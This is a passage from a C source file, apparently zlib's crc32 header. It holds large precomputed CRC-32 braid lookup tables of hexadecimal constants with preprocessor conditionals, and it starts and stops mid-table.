0x098b263d, 0x8c52b0e0, 0xd454c39d, 0x518d5540, 0x9fe19ffd, 0x1a380920, 0xab918dbd, 0x2e481b60, 0xe024d1dd, 0x65fd4700, 0x3dfb347d, 0xb822a2a0, 0x764e681d, 0xf397fec0, 0xc6428ee7, 0x439b183a, 0x8df7d287, 0x082e445a, 0x50283727, 0xd5f1a1fa, 0x1b9d6b47, 0x9e44fd9a, 0x71378a09, 0xf4ee1cd4, 0x3a82d669, 0xbf5b40b4, 0xe75d33c9, 0x6284a514, 0xace86fa9, 0x2931f974, 0x1ce48953, 0x993d1f8e, 0x5751d533, 0xd28843ee, 0x8a8e3093, 0x0f57a64e, 0xc13b6cf3, 0x44e2fa2e, 0x5edaf30e, 0xdb0365d3, 0x156faf6e, 0x90b639b3, 0xc8b04ace, 0x4d69dc13, 0x830516ae, 0x06dc8073, 0x3309f054, 0xb6d06689, 0x78bcac34, 0xfd653ae9, 0xa5634994, 0x20badf49, 0xeed615f4, 0x6b0f8329, 0x847cf4ba, 0x01a56267, 0xcfc9a8da, 0x4a103e07, 0x12164d7a, 0x97cfdba7, 0x59a3111a, 0xdc7a87c7, 0xe9aff7e0, 0x6c76613d, 0xa21aab80, 0x27c33d5d, 0x7fc54e20, 0xfa1cd8fd, 0x34701240, 0xb1a9849d, 0x17256aa0, 0x92fcfc7d, 0x5c9036c0, 0xd949a01d, 0x814fd360, 0x049645bd, 0xcafa8f00, 0x4f2319dd, 0x7af669fa, 0xff2fff27, 0x3143359a, 0xb49aa347, 0xec9cd03a, 0x694546e7, 0xa7298c5a, 0x22f01a87, 0xcd836d14, 0x485afbc9, 0x86363174, 0x03efa7a9, 0x5be9d4d4, 0xde304209, 0x105c88b4, 0x95851e69, 0xa0506e4e, 0x2589f893, 0xebe5322e, 0x6e3ca4f3, 0x363ad78e, 0xb3e34153, 0x7d8f8bee, 0xf8561d33, 0xe26e1413, 0x67b782ce, 0xa9db4873, 0x2c02deae, 0x7404add3, 0xf1dd3b0e, 0x3fb1f1b3, 0xba68676e, 0x8fbd1749, 0x0a648194, 0xc4084b29, 0x41d1ddf4, 0x19d7ae89, 0x9c0e3854, 0x5262f2e9, 0xd7bb6434, 0x38c813a7, 0xbd11857a, 0x737d4fc7, 0xf6a4d91a, 0xaea2aa67, 0x2b7b3cba, 0xe517f607, 0x60ce60da, 0x551b10fd, 0xd0c28620, 0x1eae4c9d, 0x9b77da40, 0xc371a93d, 0x46a83fe0, 0x88c4f55d, 0x0d1d6380, 0xbcb4e71d, 0x396d71c0, 0xf701bb7d, 0x72d82da0, 0x2ade5edd, 0xaf07c800, 0x616b02bd, 0xe4b29460, 0xd167e447, 0x54be729a, 0x9ad2b827, 0x1f0b2efa, 0x470d5d87, 0xc2d4cb5a, 0x0cb801e7, 0x8961973a, 0x6612e0a9, 0xe3cb7674, 0x2da7bcc9, 0xa87e2a14, 0xf0785969, 0x75a1cfb4, 0xbbcd0509, 0x3e1493d4, 0x0bc1e3f3, 0x8e18752e, 0x4074bf93, 0xc5ad294e, 0x9dab5a33, 0x1872ccee, 0xd61e0653, 0x53c7908e, 0x49ff99ae, 0xcc260f73, 0x024ac5ce, 0x87935313, 0xdf95206e, 0x5a4cb6b3, 0x94207c0e, 0x11f9ead3, 0x242c9af4, 0xa1f50c29, 0x6f99c694, 0xea405049, 0xb2462334, 0x379fb5e9, 0xf9f37f54, 0x7c2ae989, 0x93599e1a, 0x168008c7, 0xd8ecc27a, 0x5d3554a7, 0x053327da, 0x80eab107, 0x4e867bba, 0xcb5fed67, 0xfe8a9d40, 0x7b530b9d, 0xb53fc120, 0x30e657fd, 0x68e02480, 0xed39b25d, 0x235578e0, 0xa68cee3d}, {0x00000000, 0x76e10f9d, 0xadc46ee1, 0xdb25617c, 0x1b8fac19, 0x6d6ea384, 0xb64bc2f8, 0xc0aacd65, 0x361e5933, 0x40ff56ae, 0x9bda37d2, 0xed3b384f, 0x2d91f52a, 0x5b70fab7, 0x80559bcb, 0xf6b49456, 0x6c3cb266, 0x1addbdfb, 0xc1f8dc87, 0xb719d31a, 0x77b31e7f, 0x015211e2, 0xda77709e, 0xac967f03, 0x5a22eb55, 0x2cc3e4c8, 0xf7e685b4, 0x81078a29, 0x41ad474c, 0x374c48d1, 0xec6929ad, 0x9a882630, 0xd87864cd, 0xae996b50, 0x75bc0a2c, 0x035d05b1, 0xc3f7c8d4, 0xb516c749, 0x6e33a635, 0x18d2a9a8, 0xee663dfe, 0x98873263, 0x43a2531f, 0x35435c82, 0xf5e991e7, 0x83089e7a, 0x582dff06, 0x2eccf09b, 0xb444d6ab, 0xc2a5d936, 0x1980b84a, 0x6f61b7d7, 0xafcb7ab2, 0xd92a752f, 0x020f1453, 0x74ee1bce, 0x825a8f98, 0xf4bb8005, 0x2f9ee179, 0x597feee4, 0x99d52381, 0xef342c1c, 0x34114d60, 0x42f042fd, 0xf1f7b941, 0x8716b6dc, 0x5c33d7a0, 0x2ad2d83d, 0xea781558, 0x9c991ac5, 0x47bc7bb9, 0x315d7424, 0xc7e9e072, 0xb108efef, 0x6a2d8e93, 0x1ccc810e, 0xdc664c6b, 0xaa8743f6, 0x71a2228a, 0x07432d17, 0x9dcb0b27, 0xeb2a04ba, 0x300f65c6, 0x46ee6a5b, 0x8644a73e, 0xf0a5a8a3, 0x2b80c9df, 0x5d61c642, 0xabd55214, 0xdd345d89, 0x06113cf5, 0x70f03368, 0xb05afe0d, 0xc6bbf190, 0x1d9e90ec, 0x6b7f9f71, 0x298fdd8c, 0x5f6ed211, 0x844bb36d, 0xf2aabcf0, 0x32007195, 0x44e17e08, 0x9fc41f74, 0xe92510e9, 0x1f9184bf, 0x69708b22, 0xb255ea5e, 0xc4b4e5c3, 0x041e28a6, 0x72ff273b, 0xa9da4647, 0xdf3b49da, 0x45b36fea, 0x33526077, 0xe877010b, 0x9e960e96, 0x5e3cc3f3, 0x28ddcc6e, 0xf3f8ad12, 0x8519a28f, 0x73ad36d9, 0x054c3944, 0xde695838, 0xa88857a5, 0x68229ac0, 0x1ec3955d, 0xc5e6f421, 0xb307fbbc, 0xe2ef7383, 0x940e7c1e, 0x4f2b1d62, 0x39ca12ff, 0xf960df9a, 0x8f81d007, 0x54a4b17b, 0x2245bee6, 0xd4f12ab0, 0xa210252d, 0x79354451, 0x0fd44bcc, 0xcf7e86a9, 0xb99f8934, 0x62bae848, 0x145be7d5, 0x8ed3c1e5, 0xf832ce78, 0x2317af04, 0x55f6a099, 0x955c6dfc, 0xe3bd6261, 0x3898031d, 0x4e790c80, 0xb8cd98d6, 0xce2c974b, 0x1509f637, 0x63e8f9aa, 0xa34234cf, 0xd5a33b52, 0x0e865a2e, 0x786755b3, 0x3a97174e, 0x4c7618d3, 0x975379af, 0xe1b27632, 0x2118bb57, 0x57f9b4ca, 0x8cdcd5b6, 0xfa3dda2b, 0x0c894e7d, 0x7a6841e0, 0xa14d209c, 0xd7ac2f01, 0x1706e264, 0x61e7edf9, 0xbac28c85, 0xcc238318, 0x56aba528, 0x204aaab5, 0xfb6fcbc9, 0x8d8ec454, 0x4d240931, 0x3bc506ac, 0xe0e067d0, 0x9601684d, 0x60b5fc1b, 0x1654f386, 0xcd7192fa, 0xbb909d67, 0x7b3a5002, 0x0ddb5f9f, 0xd6fe3ee3, 0xa01f317e, 0x1318cac2, 0x65f9c55f, 0xbedca423, 0xc83dabbe, 0x089766db, 0x7e766946, 0xa553083a, 0xd3b207a7, 0x250693f1, 0x53e79c6c, 0x88c2fd10, 0xfe23f28d, 0x3e893fe8, 0x48683075, 0x934d5109, 0xe5ac5e94, 0x7f2478a4, 0x09c57739, 0xd2e01645, 0xa40119d8, 0x64abd4bd, 0x124adb20, 0xc96fba5c, 0xbf8eb5c1, 0x493a2197, 0x3fdb2e0a, 0xe4fe4f76, 0x921f40eb, 0x52b58d8e, 0x24548213, 0xff71e36f, 0x8990ecf2, 0xcb60ae0f, 0xbd81a192, 0x66a4c0ee, 0x1045cf73, 0xd0ef0216, 0xa60e0d8b, 0x7d2b6cf7, 0x0bca636a, 0xfd7ef73c, 0x8b9ff8a1, 0x50ba99dd, 0x265b9640, 0xe6f15b25, 0x901054b8, 0x4b3535c4, 0x3dd43a59, 0xa75c1c69, 0xd1bd13f4, 0x0a987288, 0x7c797d15, 0xbcd3b070, 0xca32bfed, 0x1117de91, 0x67f6d10c, 0x9142455a, 0xe7a34ac7, 0x3c862bbb, 0x4a672426, 0x8acde943, 0xfc2ce6de, 0x270987a2, 0x51e8883f}, {0x00000000, 0xe8dbfbb9, 0x91b186a8, 0x796a7d11, 0x63657c8a, 0x8bbe8733, 0xf2d4fa22, 0x1a0f019b, 0x87cc89cf, 0x6f177276, 0x167d0f67, 0xfea6f4de, 0xe4a9f545, 0x0c720efc, 0x751873ed, 0x9dc38854, 0x4f9f6244, 0xa74499fd, 0xde2ee4ec, 0x36f51f55, 0x2cfa1ece, 0xc421e577, 0xbd4b9866, 0x559063df, 0xc853eb8b, 0x20881032, 0x59e26d23, 0xb139969a, 0xab369701, 0x43ed6cb8, 0x3a8711a9, 0xd25cea10, 0x9e3ec588, 0x76e53e31, 0x0f8f4320, 0xe754b899, 0xfd5bb902, 0x158042bb, 0x6cea3faa, 0x8431c413, 0x19f24c47, 0xf129b7fe, 0x8843caef, 0x60983156, 0x7a9730cd, 0x924ccb74, 0xeb26b665, 0x03fd4ddc, 0xd1a1a7cc, 0x397a5c75, 0x40102164, 0xa8cbdadd, 0xb2c4db46, 0x5a1f20ff, 0x23755dee, 0xcbaea657, 0x566d2e03, 0xbeb6d5ba, 0xc7dca8ab, 0x2f075312, 0x35085289, 0xddd3a930, 0xa4b9d421, 0x4c622f98, 0x7d7bfbca, 0x95a00073, 0xecca7d62, 0x041186db, 0x1e1e8740, 0xf6c57cf9, 0x8faf01e8, 0x6774fa51, 0xfab77205, 0x126c89bc, 0x6b06f4ad, 0x83dd0f14, 0x99d20e8f, 0x7109f536, 0x08638827, 0xe0b8739e, 0x32e4998e, 0xda3f6237, 0xa3551f26, 0x4b8ee49f, 0x5181e504, 0xb95a1ebd, 0xc03063ac, 0x28eb9815, 0xb5281041, 0x5df3ebf8, 0x249996e9, 0xcc426d50, 0xd64d6ccb, 0x3e969772, 0x47fcea63, 0xaf2711da, 0xe3453e42, 0x0b9ec5fb, 0x72f4b8ea, 0x9a2f4353, 0x802042c8, 0x68fbb971, 0x1191c460, 0xf94a3fd9, 0x6489b78d, 0x8c524c34, 0xf5383125, 0x1de3ca9c, 0x07eccb07, 0xef3730be, 0x965d4daf, 0x7e86b616, 0xacda5c06, 0x4401a7bf, 0x3d6bdaae, 0xd5b02117, 0xcfbf208c, 0x2764db35, 0x5e0ea624, 0xb6d55d9d, 0x2b16d5c9, 0xc3cd2e70, 0xbaa75361, 0x527ca8d8, 0x4873a943, 0xa0a852fa, 0xd9c22feb, 0x3119d452, 0xbbf0874e, 0x532b7cf7, 0x2a4101e6, 0xc29afa5f, 0xd895fbc4, 0x304e007d, 0x49247d6c, 0xa1ff86d5, 0x3c3c0e81, 0xd4e7f538, 0xad8d8829, 0x45567390, 0x5f59720b, 0xb78289b2, 0xcee8f4a3, 0x26330f1a, 0xf46fe50a, 0x1cb41eb3, 0x65de63a2, 0x8d05981b, 0x970a9980, 0x7fd16239, 0x06bb1f28, 0xee60e491, 0x73a36cc5, 0x9b78977c, 0xe212ea6d, 0x0ac911d4, 0x10c6104f, 0xf81debf6, 0x817796e7, 0x69ac6d5e, 0x25ce42c6, 0xcd15b97f, 0xb47fc46e, 0x5ca43fd7, 0x46ab3e4c, 0xae70c5f5, 0xd71ab8e4, 0x3fc1435d, 0xa202cb09, 0x4ad930b0, 0x33b34da1, 0xdb68b618, 0xc167b783, 0x29bc4c3a, 0x50d6312b, 0xb80dca92, 0x6a512082, 0x828adb3b, 0xfbe0a62a, 0x133b5d93, 0x09345c08, 0xe1efa7b1, 0x9885daa0, 0x705e2119, 0xed9da94d, 0x054652f4, 0x7c2c2fe5, 0x94f7d45c, 0x8ef8d5c7, 0x66232e7e, 0x1f49536f, 0xf792a8d6, 0xc68b7c84, 0x2e50873d, 0x573afa2c, 0xbfe10195, 0xa5ee000e, 0x4d35fbb7, 0x345f86a6, 0xdc847d1f, 0x4147f54b, 0xa99c0ef2, 0xd0f673e3, 0x382d885a, 0x222289c1, 0xcaf97278, 0xb3930f69, 0x5b48f4d0, 0x89141ec0, 0x61cfe579, 0x18a59868, 0xf07e63d1, 0xea71624a, 0x02aa99f3, 0x7bc0e4e2, 0x931b1f5b, 0x0ed8970f, 0xe6036cb6, 0x9f6911a7, 0x77b2ea1e, 0x6dbdeb85, 0x8566103c, 0xfc0c6d2d, 0x14d79694, 0x58b5b90c, 0xb06e42b5, 0xc9043fa4, 0x21dfc41d, 0x3bd0c586, 0xd30b3e3f, 0xaa61432e, 0x42bab897, 0xdf7930c3, 0x37a2cb7a, 0x4ec8b66b, 0xa6134dd2, 0xbc1c4c49, 0x54c7b7f0, 0x2dadcae1, 0xc5763158, 0x172adb48, 0xfff120f1, 0x869b5de0, 0x6e40a659, 0x744fa7c2, 0x9c945c7b, 0xe5fe216a, 0x0d25dad3, 0x90e65287, 0x783da93e, 0x0157d42f, 0xe98c2f96, 0xf3832e0d, 0x1b58d5b4, 0x6232a8a5, 0x8ae9531c}, {0x00000000, 0x919168ae, 0x6325a087, 0xf2b4c829, 0x874c31d4, 0x16dd597a, 0xe4699153, 0x75f8f9fd, 0x4f9f1373, 0xde0e7bdd, 0x2cbab3f4, 0xbd2bdb5a, 0xc8d322a7, 0x59424a09, 0xabf68220, 0x3a67ea8e, 0x9e3e27e6, 0x0faf4f48, 0xfd1b8761, 0x6c8aefcf, 0x19721632, 0x88e37e9c, 0x7a57b6b5, 0xebc6de1b, 0xd1a13495, 0x40305c3b, 0xb2849412, 0x2315fcbc, 0x56ed0541, 0xc77c6def, 0x35c8a5c6, 0xa459cd68, 0x7d7b3f17, 0xecea57b9, 0x1e5e9f90, 0x8fcff73e, 0xfa370ec3, 0x6ba6666d, 0x9912ae44, 0x0883c6ea, 0x32e42c64, 0xa37544ca, 0x51c18ce3, 0xc050e44d, 0xb5a81db0, 0x2439751e, 0xd68dbd37, 0x471cd599, 0xe34518f1, 0x72d4705f, 0x8060b876, 0x11f1d0d8, 0x64092925, 0xf598418b, 0x072c89a2, 0x96bde10c, 0xacda0b82, 0x3d4b632c, 0xcfffab05, 0x5e6ec3ab, 0x2b963a56, 0xba0752f8, 0x48b39ad1, 0xd922f27f, 0xfaf67e2e, 0x6b671680, 0x99d3dea9, 0x0842b607, 0x7dba4ffa, 0xec2b2754, 0x1e9fef7d, 0x8f0e87d3, 0xb5696d5d, 0x24f805f3, 0xd64ccdda, 0x47dda574, 0x32255c89, 0xa3b43427, 0x5100fc0e, 0xc09194a0, 0x64c859c8, 0xf5593166, 0x07edf94f, 0x967c91e1, 0xe384681c, 0x721500b2, 0x80a1c89b, 0x1130a035, 0x2b574abb, 0xbac62215, 0x4872ea3c, 0xd9e38292, 0xac1b7b6f, 0x3d8a13c1, 0xcf3edbe8, 0x5eafb346, 0x878d4139, 0x161c2997, 0xe4a8e1be, 0x75398910, 0x00c170ed, 0x91501843, 0x63e4d06a, 0xf275b8c4, 0xc812524a, 0x59833ae4, 0xab37f2cd, 0x3aa69a63, 0x4f5e639e, 0xdecf0b30, 0x2c7bc319, 0xbdeaabb7, 0x19b366df, 0x88220e71, 0x7a96c658, 0xeb07aef6, 0x9eff570b, 0x0f6e3fa5, 0xfddaf78c, 0x6c4b9f22, 0x562c75ac, 0xc7bd1d02, 0x3509d52b, 0xa498bd85, 0xd1604478, 0x40f12cd6, 0xb245e4ff, 0x23d48c51, 0xf4edfd5c, 0x657c95f2, 0x97c85ddb, 0x06593575, 0x73a1cc88, 0xe230a426, 0x10846c0f, 0x811504a1, 0xbb72ee2f, 0x2ae38681, 0xd8574ea8, 0x49c62606, 0x3c3edffb, 0xadafb755, 0x5f1b7f7c, 0xce8a17d2, 0x6ad3daba, 0xfb42b214, 0x09f67a3d, 0x98671293, 0xed9feb6e, 0x7c0e83c0, 0x8eba4be9, 0x1f2b2347, 0x254cc9c9, 0xb4dda167, 0x4669694e, 0xd7f801e0, 0xa200f81d, 0x339190b3, 0xc125589a, 0x50b43034, 0x8996c24b, 0x1807aae5, 0xeab362cc, 0x7b220a62, 0x0edaf39f, 0x9f4b9b31, 0x6dff5318, 0xfc6e3bb6, 0xc609d138, 0x5798b996, 0xa52c71bf, 0x34bd1911, 0x4145e0ec, 0xd0d48842, 0x2260406b, 0xb3f128c5, 0x17a8e5ad, 0x86398d03, 0x748d452a, 0xe51c2d84, 0x90e4d479, 0x0175bcd7, 0xf3c174fe, 0x62501c50, 0x5837f6de, 0xc9a69e70, 0x3b125659, 0xaa833ef7, 0xdf7bc70a, 0x4eeaafa4, 0xbc5e678d, 0x2dcf0f23, 0x0e1b8372, 0x9f8aebdc, 0x6d3e23f5, 0xfcaf4b5b, 0x8957b2a6, 0x18c6da08, 0xea721221, 0x7be37a8f, 0x41849001, 0xd015f8af, 0x22a13086, 0xb3305828, 0xc6c8a1d5, 0x5759c97b, 0xa5ed0152, 0x347c69fc, 0x9025a494, 0x01b4cc3a, 0xf3000413, 0x62916cbd, 0x17699540, 0x86f8fdee, 0x744c35c7, 0xe5dd5d69, 0xdfbab7e7, 0x4e2bdf49, 0xbc9f1760, 0x2d0e7fce, 0x58f68633, 0xc967ee9d, 0x3bd326b4, 0xaa424e1a, 0x7360bc65, 0xe2f1d4cb, 0x10451ce2, 0x81d4744c, 0xf42c8db1, 0x65bde51f, 0x97092d36, 0x06984598, 0x3cffaf16, 0xad6ec7b8, 0x5fda0f91, 0xce4b673f, 0xbbb39ec2, 0x2a22f66c, 0xd8963e45, 0x490756eb, 0xed5e9b83, 0x7ccff32d, 0x8e7b3b04, 0x1fea53aa, 0x6a12aa57, 0xfb83c2f9, 0x09370ad0, 0x98a6627e, 0xa2c188f0, 0x3350e05e, 0xc1e42877, 0x507540d9, 0x258db924, 0xb41cd18a, 0x46a819a3, 0xd739710d}}; #endif #endif #if N == 5 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xaf449247, 0x85f822cf, 0x2abcb088, 0xd08143df, 0x7fc5d198, 0x55796110, 0xfa3df357, 0x7a7381ff, 0xd53713b8, 0xff8ba330, 0x50cf3177, 0xaaf2c220, 0x05b65067, 0x2f0ae0ef, 0x804e72a8, 0xf4e703fe, 0x5ba391b9, 0x711f2131, 0xde5bb376, 0x24664021, 0x8b22d266, 0xa19e62ee, 0x0edaf0a9, 0x8e948201, 0x21d01046, 0x0b6ca0ce, 0xa4283289, 0x5e15c1de, 0xf1515399, 0xdbede311, 0x74a97156, 0x32bf01bd, 0x9dfb93fa, 0xb7472372, 0x1803b135, 0xe23e4262, 0x4d7ad025, 0x67c660ad, 0xc882f2ea, 0x48cc8042, 0xe7881205, 0xcd34a28d, 0x627030ca, 0x984dc39d, 0x370951da, 0x1db5e152, 0xb2f17315, 0xc6580243, 0x691c9004, 0x43a0208c, 0xece4b2cb, 0x16d9419c, 0xb99dd3db, 0x93216353, 0x3c65f114, 0xbc2b83bc, 0x136f11fb, 0x39d3a173, 0x96973334, 0x6caac063, 0xc3ee5224, 0xe952e2ac, 0x461670eb, 0x657e037a, 0xca3a913d, 0xe08621b5, 0x4fc2b3f2, 0xb5ff40a5, 0x1abbd2e2, 0x3007626a, 0x9f43f02d, 0x1f0d8285, 0xb04910c2, 0x9af5a04a, 0x35b1320d, 0xcf8cc15a, 0x60c8531d, 0x4a74e395, 0xe53071d2, 0x91990084, 0x3edd92c3, 0x1461224b, 0xbb25b00c, 0x4118435b, 0xee5cd11c, 0xc4e06194, 0x6ba4f3d3, 0xebea817b, 0x44ae133c, 0x6e12a3b4, 0xc15631f3, 0x3b6bc2a4, 0x942f50e3, 0xbe93e06b, 0x11d7722c, 0x57c102c7, 0xf8859080, 0xd2392008, 0x7d7db24f, 0x87404118, 0x2804d35f, 0x02b863d7, 0xadfcf190, 0x2db28338, 0x82f6117f, 0xa84aa1f7, 0x070e33b0, 0xfd33c0e7, 0x527752a0, 0x78cbe228, 0xd78f706f, 0xa3260139, 0x0c62937e, 0x26de23f6, 0x899ab1b1, 0x73a742e6, 0xdce3d0a1, 0xf65f6029, 0x591bf26e, 0xd95580c6, 0x76111281, 0x5cada209, 0xf3e9304e, 0x09d4c319, 0xa690515e, 0x8c2ce1d6, 0x23687391, 0xcafc06f4, 0x65b894b3, 0x4f04243b, 0xe040b67c, 0x1a7d452b, 0xb539d76c, 0x9f8567e4, 0x30c1f5a3, 0xb08f870b, 0x1fcb154c, 0x3577a5c4, 0x9a333783, 0x600ec4d4, 0xcf4a5693, 0xe5f6e61b, 0x4ab2745c, 0x3e1b050a, 0x915f974d, 0xbbe327c5, 0x14a7b582, 0xee9a46d5, 0x41ded492, 0x6b62641a, 0xc426f65d, 0x446884f5, 0xeb2c16b2, 0xc190a63a, 0x6ed4347d, 0x94e9c72a, 0x3bad556d, 0x1111e5e5, 0xbe5577a2, 0xf8430749, 0x5707950e, 0x7dbb2586, 0xd2ffb7c1, 0x28c24496, 0x8786d6d1, 0xad3a6659, 0x027ef41e, 0x823086b6, 0x2d7414f1, 0x07c8a479, 0xa88c363e, 0x52b1c569, 0xfdf5572e, 0xd749e7a6, 0x780d75e1, 0x0ca404b7, 0xa3e096f0, 0x895c2678, 0x2618b43f, 0xdc254768, 0x7361d52f, 0x59dd65a7, 0xf699f7e0, 0x76d78548, 0xd993170f, 0xf32fa787, 0x5c6b35c0, 0xa656c697, 0x091254d0, 0x23aee458, 0x8cea761f, 0xaf82058e, 0x00c697c9, 0x2a7a2741, 0x853eb506, 0x7f034651, 0xd047d416, 0xfafb649e, 0x55bff6d9, 0xd5f18471, 0x7ab51636, 0x5009a6be, 0xff4d34f9, 0x0570c7ae, 0xaa3455e9, 0x8088e561, 0x2fcc7726, 0x5b650670, 0xf4219437, 0xde9d24bf, 0x71d9b6f8, 0x8be445af, 0x24a0d7e8, 0x0e1c6760, 0xa158f527, 0x2116878f, 0x8e5215c8, 0xa4eea540, 0x0baa3707, 0xf197c450, 0x5ed35617, 0x746fe69f, 0xdb2b74d8, 0x9d3d0433, 0x32799674, 0x18c526fc, 0xb781b4bb, 0x4dbc47ec, 0xe2f8d5ab, 0xc8446523, 0x6700f764, 0xe74e85cc, 0x480a178b, 0x62b6a703, 0xcdf23544, 0x37cfc613, 0x988b5454, 0xb237e4dc, 0x1d73769b, 0x69da07cd, 0xc69e958a, 0xec222502, 0x4366b745, 0xb95b4412, 0x161fd655, 0x3ca366dd, 0x93e7f49a, 0x13a98632, 0xbced1475, 0x9651a4fd, 0x391536ba, 0xc328c5ed, 0x6c6c57aa, 0x46d0e722, 0xe9947565}, {0x00000000, 0x4e890ba9, 0x9d121752, 0xd39b1cfb, 0xe15528e5, 0xafdc234c, 0x7c473fb7, 0x32ce341e, 0x19db578b, 0x57525c22, 0x84c940d9, 0xca404b70, 0xf88e7f6e, 0xb60774c7, 0x659c683c, 0x2b156395, 0x33b6af16, 0x7d3fa4bf, 0xaea4b844, 0xe02db3ed, 0xd2e387f3, 0x9c6a8c5a, 0x4ff190a1, 0x01789b08, 0x2a6df89d, 0x64e4f334, 0xb77fefcf, 0xf9f6e466, 0xcb38d078, 0x85b1dbd1, 0x562ac72a, 0x18a3cc83, 0x676d5e2c, 0x29e45585, 0xfa7f497e, 0xb4f642d7, 0x863876c9, 0xc8b17d60, 0x1b2a619b, 0x55a36a32, 0x7eb609a7, 0x303f020e, 0xe3a41ef5, 0xad2d155c, 0x9fe32142, 0xd16a2aeb, 0x02f13610, 0x4c783db9, 0x54dbf13a, 0x1a52fa93, 0xc9c9e668, 0x8740edc1, 0xb58ed9df, 0xfb07d276, 0x289cce8d, 0x6615c524, 0x4d00a6b1, 0x0389ad18, 0xd012b1e3, 0x9e9bba4a, 0xac558e54, 0xe2dc85fd, 0x31479906, 0x7fce92af, 0xcedabc58, 0x8053b7f1, 0x53c8ab0a, 0x1d41a0a3, 0x2f8f94bd, 0x61069f14, 0xb29d83ef, 0xfc148846, 0xd701ebd3, 0x9988e07a, 0x4a13fc81, 0x049af728, 0x3654c336, 0x78ddc89f, 0xab46d464, 0xe5cfdfcd, 0xfd6c134e, 0xb3e518e7, 0x607e041c, 0x2ef70fb5, 0x1c393bab, 0x52b03002, 0x812b2cf9, 0xcfa22750, 0xe4b744c5, 0xaa3e4f6c, 0x79a55397, 0x372c583e, 0x05e26c20, 0x4b6b6789, 0x98f07b72, 0xd67970db, 0xa9b7e274, 0xe73ee9dd, 0x34a5f526, 0x7a2cfe8f, 0x48e2ca91, 0x066bc138, 0xd5f0ddc3, 0x9b79d66a, 0xb06cb5ff, 0xfee5be56, 0x2d7ea2ad, 0x63f7a904, 0x51399d1a, 0x1fb096b3, 0xcc2b8a48, 0x82a281e1, 0x9a014d62, 0xd48846cb, 0x07135a30, 0x499a5199, 0x7b546587, 0x35dd6e2e, 0xe64672d5, 0xa8cf797c, 0x83da1ae9, 0xcd531140, 0x1ec80dbb, 0x50410612, 0x628f320c, 0x2c0639a5, 0xff9d255e, 0xb1142ef7, 0x46c47ef1, 0x084d7558, 0xdbd669a3, 0x955f620a, 0xa7915614, 0xe9185dbd, 0x3a834146, 0x740a4aef, 0x5f1f297a, 0x119622d3, 0xc20d3e28, 0x8c843581, 0xbe4a019f, 0xf0c30a36, 0x235816cd, 0x6dd11d64, 0x7572d1e7, 0x3bfbda4e, 0xe860c6b5, 0xa6e9cd1c, 0x9427f902, 0xdaaef2ab, 0x0935ee50, 0x47bce5f9, 0x6ca9866c, 0x22208dc5, 0xf1bb913e, 0xbf329a97, 0x8dfcae89, 0xc375a520, 0x10eeb9db, 0x5e67b272, 0x21a920dd, 0x6f202b74, 0xbcbb378f, 0xf2323c26, 0xc0fc0838, 0x8e750391, 0x5dee1f6a, 0x136714c3, 0x38727756, 0x76fb7cff, 0xa5606004, 0xebe96bad, 0xd9275fb3, 0x97ae541a, 0x443548e1, 0x0abc4348, 0x121f8fcb, 0x5c968462, 0x8f0d9899, 0xc1849330, 0xf34aa72e, 0xbdc3ac87, 0x6e58b07c, 0x20d1bbd5, 0x0bc4d840, 0x454dd3e9, 0x96d6cf12, 0xd85fc4bb, 0xea91f0a5, 0xa418fb0c, 0x7783e7f7, 0x390aec5e, 0x881ec2a9, 0xc697c900, 0x150cd5fb, 0x5b85de52, 0x694bea4c, 0x27c2e1e5, 0xf459fd1e, 0xbad0f6b7, 0x91c59522, 0xdf4c9e8b, 0x0cd78270, 0x425e89d9, 0x7090bdc7, 0x3e19b66e, 0xed82aa95, 0xa30ba13c, 0xbba86dbf, 0xf5216616, 0x26ba7aed, 0x68337144, 0x5afd455a, 0x14744ef3, 0xc7ef5208, 0x896659a1, 0xa2733a34, 0xecfa319d, 0x3f612d66, 0x71e826cf, 0x432612d1, 0x0daf1978, 0xde340583, 0x90bd0e2a, 0xef739c85, 0xa1fa972c, 0x72618bd7, 0x3ce8807e, 0x0e26b460, 0x40afbfc9, 0x9334a332, 0xddbda89b, 0xf6a8cb0e, 0xb821c0a7, 0x6bbadc5c, 0x2533d7f5, 0x17fde3eb, 0x5974e842, 0x8aeff4b9, 0xc466ff10, 0xdcc53393, 0x924c383a, 0x41d724c1, 0x0f5e2f68, 0x3d901b76, 0x731910df, 0xa0820c24, 0xee0b078d, 0xc51e6418, 0x8b976fb1, 0x580c734a, 0x168578e3, 0x244b4cfd, 0x6ac24754, 0xb9595baf, 0xf7d05006}, {0x00000000, 0x8d88fde2, 0xc060fd85, 0x4de80067, 0x5bb0fd4b, 0xd63800a9, 0x9bd000ce, 0x1658fd2c, 0xb761fa96, 0x3ae90774, 0x77010713, 0xfa89faf1, 0xecd107dd, 0x6159fa3f, 0x2cb1fa58, 0xa13907ba, 0xb5b2f36d, 0x383a0e8f, 0x75d20ee8, 0xf85af30a, 0xee020e26, 0x638af3c4, 0x2e62f3a3, 0xa3ea0e41, 0x02d309fb, 0x8f5bf419, 0xc2b3f47e, 0x4f3b099c, 0x5963f4b0, 0xd4eb0952, 0x99030935, 0x148bf4d7, 0xb014e09b, 0x3d9c1d79, 0x70741d1e, 0xfdfce0fc, 0xeba41dd0, 0x662ce032, 0x2bc4e055, 0xa64c1db7, 0x07751a0d, 0x8afde7ef, 0xc715e788, 0x4a9d1a6a, 0x5cc5e746, 0xd14d1aa4, 0x9ca51ac3, 0x112de721, 0x05a613f6, 0x882eee14, 0xc5c6ee73, 0x484e1391, 0x5e16eebd, 0xd39e135f, 0x9e761338, 0x13feeeda, 0xb2c7e960, 0x3f4f1482, 0x72a714e5, 0xff2fe907, 0xe977142b, 0x64ffe9c9, 0x2917e9ae, 0xa49f144c, 0xbb58c777, 0x36d03a95, 0x7b383af2, 0xf6b0c710, 0xe0e83a3c, 0x6d60c7de, 0x2088c7b9, 0xad003a5b, 0x0c393de1, 0x81b1c003, 0xcc59c064, 0x41d13d86, 0x5789c0aa, 0xda013d48, 0x97e93d2f, 0x1a61c0cd, 0x0eea341a, 0x8362c9f8, 0xce8ac99f, 0x4302347d, 0x555ac951, 0xd8d234b3, 0x953a34d4, 0x18b2c936, 0xb98bce8c, 0x3403336e, 0x79eb3309, 0xf463ceeb, 0xe23b33c7, 0x6fb3ce25, 0x225bce42, 0xafd333a0, 0x0b4c27ec, 0x86c4da0e, 0xcb2cda69, 0x46a4278b, 0x50fcdaa7, 0xdd742745, 0x909c2722, 0x1d14dac0, 0xbc2ddd7a, 0x31a52098, 0x7c4d20ff, 0xf1c5dd1d, 0xe79d2031, 0x6a15ddd3, 0x27fdddb4, 0xaa752056, 